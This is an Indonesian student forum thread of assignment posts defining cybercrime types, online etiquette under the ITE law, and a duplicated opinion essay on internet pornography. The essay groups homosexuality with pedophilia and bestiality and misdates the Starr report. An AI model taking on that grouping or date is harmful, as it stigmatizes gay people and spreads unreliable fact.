irmarr.staff.gunadarma.ac.id/Downloads/files/11611/Modus+Kejahatan+dalam+TI.doc

Lihat profil user

6 Tugas 1 on Sun Apr 08, 2012 11:08 pm

DANU BUDI NUGROHO
NIM 10010854


MODUS KEJAHATAN MENCURI PADA DUNIA KOMPUTER

Cybercrime
cybercrime merupakan perbuatan melawan hukum yang dilakukan dengan menggunakan internet yang berbasis pada kecanggihan teknologi komputer dan telekomunikasi.
Karakteristik Cybercrime

Selama ini dalam kejahatan konvensional, dikenal adanya dua jenis kejahatan sebagai berikut:

a. Kejahatan kerah biru (blue collar crime)
jenis kejahatan atau tindak kriminal yang dilakukan secara konvensional seperti misalnya perampokkan, pencurian, pembunuhan dan lain-lain.

b. Kejahatan kerah putih (white collar crime)
Kejahatan jenis ini memiliki empat kelompok kejahatan, yakni kejahatan korporasi, kejahatan birokrat, malpraktek, dan kejahatan individu.
Karakteristik unik dari kejahatan di dunia maya antara lain menyangkut lima hal berikut:

1. Ruang lingkup kejahatan
2. Sifat kejahatan
3. Pelaku kejahatan
4. Modus Kejahatan
5. Jenis kerugian yang ditimbulkan

Jenis Cybercrime
Berdasarkan jenis aktifitas yang dilakukannya, cybercrime dapat digolongkan menjadi beberapa jenis sebagai berikut:

a. Unauthorized Access
kejahatan yang terjadi ketika seseorang memasuki atau menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin, atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Probing dan port merupakan contoh kejahatan ini.

b. Illegal Contents
kejahatan yang dilakukan dengan memasukkan data atau informasi ke internet tentang suatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau menggangu ketertiban umum, contohnya adalah penyebaran pornografi.

c. Penyebaran virus secara sengaja
Penyebaran virus pada umumnya dilakukan dengan menggunakan email. Sering kali orang yang sistem emailnya terkena virus tidak menyadari hal ini. Virus ini kemudian dikirimkan ke tempat lain melalui emailnya.

d. Data Forgery
Kejahatan yang dilakukan dengan tujuan memalsukan data pada dokumen-dokumen penting yang ada di internet. Dokumen-dokumen ini biasanya dimiliki oleh institusi atau lembaga yang memiliki situs berbasis web database.

e. Cyber Espionage, Sabotage, and Extortion
Cyber Espionage merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer pihak sasaran.

f. Cyberstalking
Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer.

g. Carding
Carding merupakan kejahatan yang dilakukan untuk mencuri nomor kartu kredit milik orang lain dan digunakan dalam transaksi perdagangan di internet.

h. Hacking dan Cracker
Istilah hacker biasanya mengacu pada seseorang yang punya minat besar untuk mempelajari sistem komputer secara detail dan bagaimana meningkatkan kapabilitasnya. Adapun mereka yang sering melakukan aksi-aksi perusakan di internet lazimnya disebut cracker. Boleh dibilang cracker ini sebenarnya adalah hacker yang yang memanfaatkan kemampuannya untuk hal-hal yang negatif.

i. Cybersquatting and Typosquatting
Cybersquatting merupakan kejahatan yang dilakukan dengan mendaftarkan domain nama perusahaan orang lain dan kemudian berusaha menjualnya kepada perusahaan tersebut dengan harga yang lebih mahal.

j. Hijacking
Hijacking merupakan kejahatan melakukan pembajakan hasil karya orang lain.

k. Cyber Terorism
Suatu tindakan cybercrime termasuk cyber terorism jika mengancam pemerintah atau warganegara, termasuk cracking ke situs pemerintah atau militer.
Berdasarkan Motif Kegiatan
Berdasarkan motif kegiatan yang dilakukannya, cybercrime dapat digolongkan menjadi dua jenis sebagai berikut :

1. Cybercrime sebagai tindakan murni criminal
2. Cybercrime sebagai kejahatan ”abu-abu”

Berdasarkan Sasaran Kejahatan
Sedangkan berdasarkan sasaran kejahatan, cybercrime dapat dikelompokkan menjadi beberapa kategori seperti berikut ini :


a. Cybercrime yang menyerang individu (Against Person)
Beberapa contoh kejahatan ini antara lain :

• Pornografi
Kegiatan yang dilakukan dengan membuat, memasang, mendistribusikan, dan menyebarkan material yang berbau pornografi, cabul, serta mengekspos hal-hal yang tidak pantas.

• Cyberstalking
Kegiatan yang dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya dengan menggunakan e-mail yang dilakukan secara berulang-ulang seperti halnya teror di dunia cyber. Gangguan tersebut bisa saja berbau seksual, religius, dan lain sebagainya.

• Cyber-Tresspass
Kegiatan yang dilakukan melanggar area privasi orang lain seperti misalnya Web Hacking. Breaking ke PC, Probing, Port Scanning dan lain sebagainya.

b. Cybercrime menyerang hak milik (Againts Property)
c. Cybercrime menyerang pemerintah (Againts Government)


my personal web
imaginer by KuHanyaRumputLiar
[/b]

Evil or Very Mad Evil or Very Mad Evil or Very Mad Evil or Very Mad Evil or Very Mad Evil or Very Mad lol! lol! lol! lol! lol! lol! lol! lol! [b]

Lihat profil user

7 Tugas 1 on Mon Apr 09, 2012 12:16 pm

Edi Susanto
10010860


ETIKA DUNIA MAYA

Tata krama dan kesopanan tidak hanya berlaku di dunia nyata, dunia maya juga memerlukan kesadaran dan prilaku sopan yang sama.
Facebook dan twitter siapa yang tak mengenalnya? Facebook dan Twitter merupakan jejaring sosial yang paling digemari saat ini. Tidak hanya remaja tapi hampir semua orang. Memiliki akun pada jejaring sosial tersebut memang tidak masalah, selama semuanya dipergunakan dengan baik dan benar oleh si pengguna.

Namun, walupun kita sudah menggunakan akun pada jejaring sosial tersebut dengan baik dan benar, kadang juga kita sering terkena masalah akibat penggunaan jejaring sosial. Hal ini tidak hanya pada jejaring sosial. Forum-forum internet seperti Indowebster serta Kaskus, chatting, e-mail (lebih sering pada maillist) bahkan blog, juga sering terjadi permasalahan yang didasari pada isi posting (tulisan, foto, video) dari pengguna. Penyebab utama dari permasalahan yang sering kita temui antara lain akibat kurangnya etika pengguna akun dalam dunia maya, baik dari diri sendiri maupun orang lain.

Dibawah ini ada beberapa etika khusus untuk berkomunikasi dalam sebuah forum/milis

Mengisi blog dengan hal-hal yang positif, jangan berharap pengunjungnya banyak dengan "menghalalkan" segala cara dan semua content.

Ada ucapan salam, bicara sopan dan menjauhi SARA.

Kalau harus mengkritik harus berdasarkan fakta dan data; jangan langsung kepada pribadi seseoran. Hati-hati menuliskan status, khususnya ketika lagi kesal…(lebih baik tidak dituliskan)

Jika ada istilah mulutmu adalah harimaumu, maka di duniamaya ingat selalu bahwa : tulisanmu adalah harimaumu.

Jika selama ini content yang dilarang masih banyak berkeliaran, maka sebenarnya mereka hanya menunggu waktu untuk diperkarakan.

Ada pun hukum yg mengatur dunia maya seperti di negara kita Indonesia yaitu Undang-Undang ITE (Informasi dan Transaksi Elektronik )
Karena sifatnya yang berisi aturan main di dunia maya, UU ITE ini juga dikenal sebagai Cyber Law.Sebagaimana layaknya Cyber Law di negara-negara lain, UU ITE ini juga bersifat ekstraterritorial, jadi tidak hanya mengatur perbuatan orang yang berdomisili di Indonesia tapi juga berlaku untuk setiap orang yang berada di wilayah hukum di luar Indonesia, yang perbuatannya memiliki akibat hukum di Indonesia atau di luar wilayah Indonesia dan merugikan kepentingan Indonesia.
Dalam perkembangannya, UU ITE yang rancangannya sudah masuk dalam agenda DPR sejak hampir sepuluh tahun yang lalu, terus mengalami penambahan disana-sini, termasuk perlindungan dari serangan hacker, pelarangan penayangan content yang memuat unsur-unsur pornografi, pelanggaran kesusilaan, pencemaran nama baik, penghinaan dan lain sebagainya. Terdapat sekitar 11 pasal yang mengatur tentang perbuatan-perbuatan yang dilarang dalam UU ITE, yang mencakup hampir 22 jenis perbuatan yang dilarang. Dari 11 Pasal tersebut ada 3 pasal yang dicurigai akan membahayakan blogger, pasal-pasal yang mengatur larangan-larangan tertentu di dunia maya, yang bisa saja dilakukan oleh seorang blogger tanpa dia sadari. Pasal-Pasal tersebut adalah Pasal 27 ayat (1) dan (3), Pasal 28 ayat (2), serta Pasal 45 ayat (1) dan (2).

Pasal 27 ayat (1)
”Setiap Orang dengan sengaja dan tanpa hak mendistribusikan dan/atau mentransmisikan dan/atau membuat dapat diaksesnya Informasi Elektronik dan/atau Dokumen Elektronik yang memiliki muatan yang melanggar kesusilaan.”

Pasal 27 ayat (3)
”Setiap Orang dengan sengaja dan tanpa hak mendistribusikan dan/atau mentransmisikan dan/atau membuat dapat diaksesnya Informasi Elektronik dan/atau Dokumen Elektronik yang memiliki muatan penghinaan dan/atau pencemaran nama baik. ”
Pasal 28 ayat (2)
“Setiap Orang dengan sengaja dan tanpa hak menyebarkan informasi yang ditujukan untuk menimbulkan rasa kebencian atau permusuhan individu dan/atau kelompok masyarakat tertentu berdasarkan atas suku, agama, ras, dan antargolongan (SARA).”
Atas pelanggaran pasal-pasal tersebut, UU ITE memberikan sanksi yang cukup berat sebagaimana di atur dalam Pasal 45 ayat (1) dan (2).
Pasal 45 ayat (1)
“Setiap orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 27 ayat (1), ayat (2), ayat (3), atau ayat (4) dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp1.000.000.000,00 (satu miliar rupiah).
Pasal 45 ayat (2)
“Setiap orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 28 ayat (1) atau ayat (2) dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp1.000.000.000,00 (satu miliar rupiah).”

Pasal-pasal tersebut di atas walaupun bertujuan baik, namun dikhawatirkan dapat menjadi pisau bermata dua, karena disisi lain bisa membahayakan pilar-pilar demokrasi, dimana azas demokrasi menjunjung tinggi kebebasan menyatakan pendapat dan pikiran serta kebebasan untuk memperoleh informasi.


Daftar Pustaka
Undang-Undang No. 11 tahun 2008
yudhim.blogspot.com/2009/04/etika-dalam-berkomunikasi-dalam-dunia.html
zulkarnaen.wordpress.com/2008/02/20/etika-berinternet/
muhamadnurhasan.blogspot.com/2012/02/etika-dunia-maya.html[b]

Lihat profil user
SEDIKIT TENTANG DUNIA MAYA dan INTERNET

“Pornografi melalui internet”
Di jaman sekarang ini dunia yang satu ini sudah menjadi sangat lumrah dan sangat mudah di akses, baik menggunakan MOBILE maupun PC. Dunia maya,,, ya kita menyebutnya begitu, dunia maya kita bisa mengakses apapun semau kita. Mulai dari kejahatan dunia maya atau sering di sebut dengan “cybercrime” adalah istilah yang mengacu pada aktivitas kejahatan dengan komputer atau jaringan komputer yang menjadi alatnya. Kejahatan dunia maya antara lain adalah penipuan lelang secara Online, pemalsuan CEK, penipuan kartu kredit, confiden fraud, penipuan identitas, dll.
Contoh kejahatan dunia maya di mana komputer sebagai alat adalah spamming dan kejahatan terhadap hak cipta dan kejahatan intelektual.
Contoh kejahatan dunia maya yang lain di mana komputer sebagai sasarannya adalah akses ilegal (mengelabui kontrol akses), malware dan serangan DoS. dan masih banyak kejahatan2 dunia maya yang lain…
Dan tak kalah seru ada yang menyebutnya dengan Perang Jaringan…. nah yang ini silahkan cek sendiri… hehehe
bila masih penasaran silahkan hubungi om googling… ^_^
Di luar tentang kejahatan2 dunia maya banyak manfaat yang dapat di ambil dari dunia maya…
salah satu contohnya adalah akses ke sumber informasi.
Sebelum adanya Internet, masalah utama yang dihadapi oleh pendidikan (di seluruh dunia) adalah akses kepada sumber informasi. Perpustakaan yang konvensional merupakan sumber informasi yang sayangnya tidak murah. Buku-buku dan journal harus dibeli dengan harga mahal. Pengelolaan yang baik juga tidak mudah. Sehingga akibatnya banyak tempat di berbagai lokasi di dunia (termasuk di dunia Barat) yang tidak memiliki perpustakaan yang lengkap. Adanya Internet memungkinkan mengakses kepada sumber informasi yang mulai tersedia banyak. Dengan kata lain, masalah akses semestinya bukan menjadi masalah lagi.
Selain dapat belajar kita juga dapat mencari teman2 lama atau mendapat teman baru, melalui berbagai jejaring sosial, entah itu facebook, friendster, antar blog, maupun berbagai macam forum diskusi yang bertebaran di dunia maya.
Tapi ada yang mengganjal di pikiranku, yaitu mengenai pornografi yang makin menggila. Mungkin ini salah satu sisi kelam dunia internet, yakni hal-hal yang berbau cabul nampaknya makin akrab za dengan anak-anak jaman sekarang di sepanjang tahun ini.
Batas antarnegara pun di terjang. Kini bisa hadir online 24 jam di rumah-rumah kita. internet adalah jalan tembusnya.

Kecanggihan teknologi memang pisau bermata dua. Salah pemanfaatan bukan kebaikan yang datang, tapi marabahaya. Itu juga yang berlaku pada internet. Kemudahan informasi via internet ternyata mengundang hadirnya industri pornografi. Adalah ulah sejumlah kapitalis yang menanamkan investasi di bisnis pornografi dunia maya. Beragam informasi yang bikin gerah banyak orang itu ditawarkan. Mulai dari sekedar menampilkan gambar wanita telanjang hingga adegan-adegan yang menjijikkan dan di luar batas kemanusiaan juga dijajakan; seperti lesbian, homoseksual, pedofilia dan hubungan intim dengan hewan. Tapi apapun komentar banyak orang termasuk kita umat Muslim, erotisme yang ditawarkan via internet telah mendobrak batas-batas penghalang antara publik termasuk remaja dengan para produser pornografi. Kini, orang dewasa dan remaja tidak perlu sembunyi-sembunyi membeli majalah atau VCD porno karena semuanya dapat hadir di warung internet, dan bahkan rumah. Seperti kata Scott Hirsch, pemilik DOMELive salah satu situs porno terbesar di Amrik, “Internet telah memecahkan problem distribusi yang menghadang industri pornografi.”
Ini terlihat dari hasil penelitian vendor keamanan Symantec, yang mengungkap 100 topik pencarian paling populer tahun ini di kalangan anak-anak usia 13-18 tahun.
Memprihatinkan, karena kata kunci seks dan porno ternyata menduduki di tempat salah satu posisi tertinggi dalam daftar tersebut.
Berdasarkan kategori jenis kelamin, topik seks bercokol di tempat keempat pencarian paling populer bagi anak lelaki dan di posisi kelima daftar pencarian anak perempuan.
Anak laki-laki sepertinya lebih tertarik pada hal-hal berbau mesum, karena topik porno bertengger di tempat kelima dalam daftar mereka. Sementara anak perempuan cenderung menggemari subyek seperti musik, acara televisi, film dan selebritis.
Selebritis yang paling banyak dicari adalah Michael Jackson, meski posisinya di luar 10 besar. Seleb seperti Miley Cyrus, Britney Spears, dan Jonas Brothers juga paling banyak diminati.
Seperti detikINET kutip dari Cnet, Senin (21/12/2009), untuk mengkompilasi daftar 100 besar ini, Symantec menganalisis 14,6 juta pencarian yang dilakukan via layanan Online Family Norton.
Berikut adalah salah satu hasil penelitian yang memuat 10 besar topik pencarian di kalangan anak-anak sepanjang 2009:
1. YouTube
2. Facebook
3. Google
4. Sex
5. MySpace
6. Porn
7. Yahoo
8. YouTube.com
9. eBay
10. WIkipedia
Apa kelebihan informasi yang diturunkan internet? Bebas sensor. Bila jaringan televisi dan media cetak harus melalui sensor terlebih dahulu, situs-situs menyajikannya dengan komplit. Detil demi detil perselingkuhan Mr. Bill dan karyawan magang Gedung Putih itu dikupas tuntas. Mulai dari proses perkenalan, tubrukan yang direkayasa, surat-suratan dan telepon-teleponan yang penuh rayuan gombal, hingga sejumlah perzinaan yang dilakukan sang presiden dengan pegawainya tersebut.
Clinton-Lewinsky
Setelah Kongres Amerika menyetujui pembeberan skandal Bill Clinton dan Monica Lewinsky – hasil investigasi Kenneth Starr, 11 September 1997, sontak banyak orang mengalihkan perhatian mereka ke layar monitor. Meng -klik sejumlah situs internet dan membaca laporan setebal 442 halaman. Begitu banyaknya orang yang mengakses internet, membuat mengakses laporan itu tak segampang biasanya.
(saking banyak yang akses kali ya…) ^_^
Itulah yang menyebabkan internet mulai dilirik para pengusaha seks. Mudah dijangkau konsumen.
dan mudah di akses tentunya.
Salah perusahaan penyedia jasa erotisme Internet Video Group (IVG) menceritakan keuntungan yang mereka raup. Pemiliknya, Scott Hirsch, mampu membeli rumah mewah dan Mercedes Benz dalam sekejap. Untuk itu Hirsch mempekerjakan 3 lusin wanita cantik yang sehari-harinya ‘bertugas’ menampilkan kemesuman. Mereka kebanyakan para penari malam yang sudah jenuh bekerja di klab-klab malam. Para ‘artis’ itu bekerja di areal terbuka seluas 22.000 meter persegi di Pompano Beach, yang berfungsi sebagai cyberbroadcast, dilengkapi segala fasilitas termasuk gimnasium untuk menjaga kebugaran para ‘karyawan’. Gedungnya saja senilai US$ 1,6 juta. Tapi biaya besar itu tidak menjadi soal karena Hirsch paham betul seluk beluk bisnis ini. Perhitungan Hirsch benar, dalam tiga bulan perusahaannya sudah meraup keuntungan.
Perusahaan yang dipimpin usahawan contact lens, pernah membuat gebrakan sinting yang menjadi skandal. Mereka promosi akan menayangkan adegan mesum sepasang pemuda bernama Mike dan Diane, yang akan melepas keperawanannya 4 Agustus ‘98 lalu. Para penggila erotisme kontan memburu tayangan tersebut. Ketika rencana itu diumumkan pada pertengahan Juli, dalam sekejap 50.000 orang tercatat bakal masuk situs tersebut. Masing-masing dikenai tarif US$ 5-US$ 8.

Namun tayangan sinting bin ngawur itu keburu terbongkar. Mike ternyata bernama Ty Taylor, 23 tahun, seorang pengangguran dari Alabama. Sedangkan Diane bernama Michelle Parma, asal Texas. Michelle mengaku ia sudah tak gadis lagi. Diduga keduanya melakukanitu untuk publisitas dan duit. Tapi keduanya menyangkal tuduhan tersebut, “Ini untuk pendidikan seks yang sehat,” kata Michelle. Rupanya mereka disponsori Condomania, sebuah perusahaan retail kondom di California. Gila nggak tuh!
Berapa keuntungan bisnis situs porno ini? Cukup susah untuk menghitungnya. Karena begitu banyaknya perusahaan seperti ini tersebar di pelosok bumi. Forrester Research, sebuah jasa konsultasi bidang telekomunikasi di Boston, mengungkapkan bahwa layanan hiburan orang dewasa (adult entertainment) mencapai US$ 50 juta pertahun. Sumber lain mengungkap tahun lalu, situs asusila ini ditaksir mengeruk keuntungan hingga US$ 200 juta, atau 35 % dari US$ 550 juta pendapatan bisnis internet.
Apa yang kini berkecamuk di dunia cyberspace adalah gambaran betapa batas asusila dan susila itu sudah menjadi kabur, bahkan nyaris tidak ada. Itulah kapitalisme. Dengan asas manfaatnya sukses mengecoh manusia untuk menjadi gila harta sekalipun dengan mengorbankan moral dan harga diri. Apa mereka akan hancurnya generasi muda dan juga masyarakat? Pertanyaan seperti itu rasanya percuma dilontarkan pada mereka, tapi lebih tepat ditujukan pada umat Muslim. Agar mereka tidak lagi mengagungkan kapitalisme, demokrasi dan sekulerisme. Toh, sudah terbukti borok-boroknya.

Selamatkan Anak-anak !!!
Tanah air kekhawatiran akan anak-anak mengkonsumsi pornografi???
Di Amerika sudah banyak orang tua yang mengajukan protes pada pemerintah setempat.? Menyadari bahayanya, dua orang senator Amerika, James Exon dari Nebraska dan Dan Coats dari Indiana segera merancang undang-undang untuk membasmi cybersex, yang disebut Communication Decency Act. Dua orang senator ini mengancam akan memasukkan sanksi dendan US$ 100 ribu bagi siapa saja yang membuat gambar porno itu bisa dijangkau anak-anak. Tapi usulan ini mendapat protes keras, terutama karena berlawanan dengan First Amandement, yang, antara lain, melarang Kongres membatasi kebebasan pers, berbicara dan hak mendapat informasi. Itulah ruwetnya demokrasi; selalu mengatasnamakan kebebasan padahal banyak urusan yang membahayakan moral publik, terutama remaja dan anak-anak.
Selain mendapat tentangan secara hukum, banyak kalangan meragukan keefektifan pemerintah mengontrol dunia tanpa batas tersebut. Server lokal bisa saja dibungkam, tapi bagaimana dengan yang dari luar wilayah hukum AS? Ini yang menjadi persoalan. Di Asia, langkah positif ini sudah diikuti oleh Singapura. Pemerintah setempat sudah melakukan pembatasan. Provider, perusahaan penyedia jasa layanan internet dibatasi hanya dua buah saja. Mereka juga dikontrol ketat. Bagi mereka yang kepergok menyebarkan pornografi ada ancaman hukuman kurungan dan denda.
Bagaimana di Indonesia? Para penggemar dan penggiat situs porno boleh menarik nafas lega, soalnya pemerintah nampaknya masih adem ayem.
Ancaman pornografi pada anak-anak bukan saja kekhawatiran mereka bakal mengkonsumsi tayangan tersebut, tapi mereka juga bisa menjadi korbannya. Banyak situs porno di internet yang menayangkan pornografi yang dilakukan oleh anak-anak. Baik foto mesum ataupan adegan mesumnya itu sendiri.
Meski usaha keras kepolisian dilakukan, namun menggulung jaringan pornografi anak tidaklah mudah. Wakil Direktur BNCS, Bob Packham, mengakui hal tersebut. Jaringan yang bernama Wonderland itu muncul di AS dan menyebar ke 12 negara di Eropa dan Australia, mereka memiliki sistem yang canggih. Mereka menggunakan kode pengamanan yang dikembangkan dinas rahasia KGB, dalam jaringan komunikasinya. Dahsyat memang!
Selama mental manusia tidak dibenahi dengan akidah yang shahih, maka penghargaan pada sesama manusia tidak akan pernah ada. Yang muncul malah eksploitasi dan saling memeras, termasuk pada anak-anak, kelompok manusia yang paling lemah. Maka, manusia harus jujur bahwa mereka membutuhkan Islam. Satu-satunya ideologi yang menentang eksploitasi terhadap sesama manusia, dan mencintai kelompok yang lemah, khususnya anak-anak.

Sumber : teknologi.kompasiana.com/internet/2010/05/13/sedikit-tentang-dunia-maya-dan-internet

Lihat profil user

9 TUGAS 1 - KEJAHATAN DUNIA MAYA on Wed Apr 11, 2012 9:42 pm

SEDIKIT TENTANG DUNIA MAYA dan INTERNET

“Pornografi melalui internet”
Di jaman sekarang ini dunia yang satu ini sudah menjadi sangat lumrah dan sangat mudah di akses, baik menggunakan MOBILE maupun PC. Dunia maya,,, ya kita menyebutnya begitu, dunia maya kita bisa mengakses apapun semau kita. Mulai dari kejahatan dunia maya atau sering di sebut dengan “cybercrime” adalah istilah yang mengacu pada aktivitas kejahatan dengan komputer atau jaringan komputer yang menjadi alatnya. Kejahatan dunia maya antara lain adalah penipuan lelang secara Online, pemalsuan CEK, penipuan kartu kredit, confiden fraud, penipuan identitas, dll.
Contoh kejahatan dunia maya di mana komputer sebagai alat adalah spamming dan kejahatan terhadap hak cipta dan kejahatan intelektual.
Contoh kejahatan dunia maya yang lain di mana komputer sebagai sasarannya adalah akses ilegal (mengelabui kontrol akses), malware dan serangan DoS. dan masih banyak kejahatan2 dunia maya yang lain…
Dan tak kalah seru ada yang menyebutnya dengan Perang Jaringan…. nah yang ini silahkan cek sendiri… hehehe
bila masih penasaran silahkan hubungi om googling… ^_^
Di luar tentang kejahatan2 dunia maya banyak manfaat yang dapat di ambil dari dunia maya…
salah satu contohnya adalah akses ke sumber informasi.
Sebelum adanya Internet, masalah utama yang dihadapi oleh pendidikan (di seluruh dunia) adalah akses kepada sumber informasi. Perpustakaan yang konvensional merupakan sumber informasi yang sayangnya tidak murah. Buku-buku dan journal harus dibeli dengan harga mahal. Pengelolaan yang baik juga tidak mudah. Sehingga akibatnya banyak tempat di berbagai lokasi di dunia (termasuk di dunia Barat) yang tidak memiliki perpustakaan yang lengkap. Adanya Internet memungkinkan mengakses kepada sumber informasi yang mulai tersedia banyak. Dengan kata lain, masalah akses semestinya bukan menjadi masalah lagi.
Selain dapat belajar kita juga dapat mencari teman2 lama atau mendapat teman baru, melalui berbagai jejaring sosial, entah itu facebook, friendster, antar blog, maupun berbagai macam forum diskusi yang bertebaran di dunia maya.
Tapi ada yang mengganjal di pikiranku, yaitu mengenai pornografi yang makin menggila. Mungkin ini salah satu sisi kelam dunia internet, yakni hal-hal yang berbau cabul nampaknya makin akrab za dengan anak-anak jaman sekarang di sepanjang tahun ini.
Batas antarnegara pun di terjang. Kini bisa hadir online 24 jam di rumah-rumah kita. internet adalah jalan tembusnya.

Kecanggihan teknologi memang pisau bermata dua. Salah pemanfaatan bukan kebaikan yang datang, tapi marabahaya. Itu juga yang berlaku pada internet. Kemudahan informasi via internet ternyata mengundang hadirnya industri pornografi. Adalah ulah sejumlah kapitalis yang menanamkan investasi di bisnis pornografi dunia maya. Beragam informasi yang bikin gerah banyak orang itu ditawarkan. Mulai dari sekedar menampilkan gambar wanita telanjang hingga adegan-adegan yang menjijikkan dan di luar batas kemanusiaan juga dijajakan; seperti lesbian, homoseksual, pedofilia dan hubungan intim dengan hewan. Tapi apapun komentar banyak orang termasuk kita umat Muslim, erotisme yang ditawarkan via internet telah mendobrak batas-batas penghalang antara publik termasuk remaja dengan para produser pornografi. Kini, orang dewasa dan remaja tidak perlu sembunyi-sembunyi membeli majalah atau VCD porno karena semuanya dapat hadir di warung internet, dan bahkan rumah. Seperti kata Scott Hirsch, pemilik DOMELive salah satu situs porno terbesar di Amrik, “Internet telah memecahkan problem distribusi yang menghadang industri pornografi.”
Ini terlihat dari hasil penelitian vendor keamanan Symantec, yang mengungkap 100 topik pencarian paling populer tahun ini di kalangan anak-anak usia 13-18 tahun.
Memprihatinkan, karena kata kunci seks dan porno ternyata menduduki di tempat salah satu posisi tertinggi dalam daftar tersebut.
Berdasarkan kategori jenis kelamin, topik seks bercokol di tempat keempat pencarian paling populer bagi anak lelaki dan di posisi kelima daftar pencarian anak perempuan.
Anak laki-laki sepertinya lebih tertarik pada hal-hal berbau mesum, karena topik porno bertengger di tempat kelima dalam daftar mereka. Sementara anak perempuan cenderung menggemari subyek seperti musik, acara televisi, film dan selebritis.
Selebritis yang paling banyak dicari adalah Michael Jackson, meski posisinya di luar 10 besar. Seleb seperti Miley Cyrus, Britney Spears, dan Jonas Brothers juga paling banyak diminati.
Seperti detikINET kutip dari Cnet, Senin (21/12/2009), untuk mengkompilasi daftar 100 besar ini, Symantec menganalisis 14,6 juta pencarian yang dilakukan via layanan Online Family Norton.
Berikut adalah salah satu hasil penelitian yang memuat 10 besar topik pencarian di kalangan anak-anak sepanjang 2009:
1. YouTube
2. Facebook
3. Google
4. Sex
5. MySpace
6. Porn
7. Yahoo
8. YouTube.com
9. eBay
10. WIkipedia
Apa kelebihan informasi yang diturunkan internet? Bebas sensor. Bila jaringan televisi dan media cetak harus melalui sensor terlebih dahulu, situs-situs menyajikannya dengan komplit. Detil demi detil perselingkuhan Mr. Bill dan karyawan magang Gedung Putih itu dikupas tuntas. Mulai dari proses perkenalan, tubrukan yang direkayasa, surat-suratan dan telepon-teleponan yang penuh rayuan gombal, hingga sejumlah perzinaan yang dilakukan sang presiden dengan pegawainya tersebut.
Clinton-Lewinsky
Setelah Kongres Amerika menyetujui pembeberan skandal Bill Clinton dan Monica Lewinsky – hasil investigasi Kenneth Starr, 11 September 1997, sontak banyak orang mengalihkan perhatian mereka ke layar monitor. Meng -klik sejumlah situs internet dan membaca laporan setebal 442 halaman. Begitu banyaknya orang yang mengakses internet, membuat mengakses laporan itu tak segampang biasanya.
(saking banyak yang akses kali ya…) ^_^
Itulah yang menyebabkan internet mulai dilirik para pengusaha seks. Mudah dijangkau konsumen.
dan mudah di akses tentunya.
Salah perusahaan penyedia jasa erotisme Internet Video Group (IVG) menceritakan keuntungan yang mereka raup. Pemiliknya, Scott Hirsch, mampu membeli rumah mewah dan Mercedes Benz dalam sekejap. Untuk itu Hirsch mempekerjakan 3 lusin wanita cantik yang sehari-harinya ‘bertugas’ menampilkan kemesuman. Mereka kebanyakan para penari malam yang sudah jenuh bekerja di klab-klab malam. Para ‘artis’ itu bekerja di areal terbuka seluas 22.000 meter persegi di Pompano Beach, yang berfungsi sebagai cyberbroadcast, dilengkapi segala fasilitas termasuk gimnasium untuk menjaga kebugaran para ‘karyawan’. Gedungnya saja senilai US$ 1,6 juta. Tapi biaya besar itu tidak menjadi soal karena Hirsch paham betul seluk beluk bisnis ini. Perhitungan Hirsch benar, dalam tiga bulan perusahaannya sudah meraup keuntungan.
Perusahaan yang dipimpin usahawan contact lens, pernah membuat gebrakan sinting yang menjadi skandal. Mereka promosi akan menayangkan adegan mesum sepasang pemuda bernama Mike dan Diane, yang akan melepas keperawanannya 4 Agustus ‘98 lalu. Para penggila erotisme kontan memburu tayangan tersebut. Ketika rencana itu diumumkan pada pertengahan Juli, dalam sekejap 50.000 orang tercatat bakal masuk situs tersebut. Masing-masing dikenai tarif US$ 5-US$ 8.

Namun tayangan sinting bin ngawur itu keburu terbongkar. Mike ternyata bernama Ty Taylor, 23 tahun, seorang pengangguran dari Alabama. Sedangkan Diane bernama Michelle Parma, asal Texas. Michelle mengaku ia sudah tak gadis lagi. Diduga keduanya melakukanitu untuk publisitas dan duit. Tapi keduanya menyangkal tuduhan tersebut, “Ini untuk pendidikan seks yang sehat,” kata Michelle. Rupanya mereka disponsori Condomania, sebuah perusahaan retail kondom di California. Gila nggak tuh!
Berapa keuntungan bisnis situs porno ini? Cukup susah untuk menghitungnya. Karena begitu banyaknya perusahaan seperti ini tersebar di pelosok bumi. Forrester Research, sebuah jasa konsultasi bidang telekomunikasi di Boston, mengungkapkan bahwa layanan hiburan orang dewasa (adult entertainment) mencapai US$ 50 juta pertahun. Sumber lain mengungkap tahun lalu, situs asusila ini ditaksir mengeruk keuntungan hingga US$ 200 juta, atau 35 % dari US$ 550 juta pendapatan bisnis internet.
Apa yang kini berkecamuk di dunia cyberspace adalah gambaran betapa batas asusila dan susila itu sudah menjadi kabur, bahkan nyaris tidak ada. Itulah kapitalisme. Dengan asas manfaatnya sukses mengecoh manusia untuk menjadi gila harta sekalipun dengan mengorbankan moral dan harga diri. Apa mereka akan hancurnya generasi muda dan juga masyarakat? Pertanyaan seperti itu rasanya percuma dilontarkan pada mereka, tapi lebih tepat ditujukan pada umat Muslim. Agar mereka tidak lagi mengagungkan kapitalisme, demokrasi dan sekulerisme. Toh, sudah terbukti borok-boroknya.

Selamatkan Anak-anak !!!
Tanah air kekhawatiran akan anak-anak mengkonsumsi pornografi???
Di Amerika sudah banyak orang tua yang mengajukan protes pada pemerintah setempat.? Menyadari bahayanya, dua orang senator Amerika, James Exon dari Nebraska dan Dan Coats dari Indiana segera merancang undang-undang untuk membasmi cybersex, yang disebut Communication Decency Act. Dua orang senator ini mengancam akan memasukkan sanksi dendan US$ 100 ribu bagi siapa saja yang membuat gambar porno itu bisa dijangkau anak-anak. Tapi usulan ini mendapat protes keras, terutama karena berlawanan dengan First Amandement, yang, antara lain, melarang Kongres membatasi kebebasan pers, berbicara dan hak mendapat informasi. Itulah ruwetnya demokrasi; selalu mengatasnamakan kebebasan padahal banyak urusan yang membahayakan moral publik, terutama remaja dan anak-anak.
